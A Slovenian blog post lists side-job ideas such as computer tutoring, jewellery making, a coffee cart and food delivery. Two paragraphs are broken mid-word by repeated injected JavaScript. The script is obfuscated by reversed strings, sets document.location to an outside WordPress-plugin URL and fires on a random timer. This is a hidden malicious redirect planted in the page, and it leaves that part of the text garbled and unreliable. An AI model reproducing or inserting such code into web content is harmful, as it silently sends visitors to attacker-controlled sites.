Dodatna zaposlitev? Zakaj pa ne.

By | 27 oktobra, 2016

Kljub temu, da so časi zaposlitve vse prej kot rožnati, si lahko sami priskrbite kar nekaj dela. Vse kar potrebujete je le volja in odločnost. Znanje in spretnost pa si boste že nabrali med delom.

Redna služba je cilj vsakega študenta in vseh tistih, ki so ostali brez službe. Predvsem študentje so na udaru, kajti po dokončanem študiju jih veliko ne dela tistega za kar so se izobraževali. Nekateri pa celo odidejo v druge države poizkusit svojo srečo. Ker pa smo mnenja, da morate za svoj uspeh sami poskrbeti, smo pripravili prispevek v katerem navajamo nekatere možnosti s katerimi lahko pričnete svojo dejavnost ali pa poleg redne službe, opravljate še dodatno delo.

 

Računalniško izobraževanje.

V kolikor ste vešči uporabe računalnika, se lahko odločite za računalniško izobraževanje. Kar precej je ljudi, ki še vedno ne znajo uporabljati računalnika, bi si pa toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to želeli. Vse kar potrebujete je prenosni računalnik ali dva, nekaj letakov in že lahko delate.

 

Izdelava nakita po meri.

Če ste mnenja, ad ste spretni z rokami in imate smisel za estetiko, se lahko lotite ročne izdelave nakita. Narava ponuja vse potrebno. Torej so stroški materiala praktično nični. Samo še spletno stran si postavite in prodaja se lahko prične.

 

Potujoči bar.

Največje marže se skrivajo v pijači in hrani. Zlasti kava je takšna kjer je dobiček tudi več kot 50%. Omislite si voziček s kavo avtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom in se podajte na ulice, prizorišča in začnite služit denar.

 

Dostava hrane restavracijam.

Če si lahko privoščite kombi, potem lahko začnete z dostavo hrane restavracijam in pekarnam. Samo pravočasni morate biti, in delo je vaše.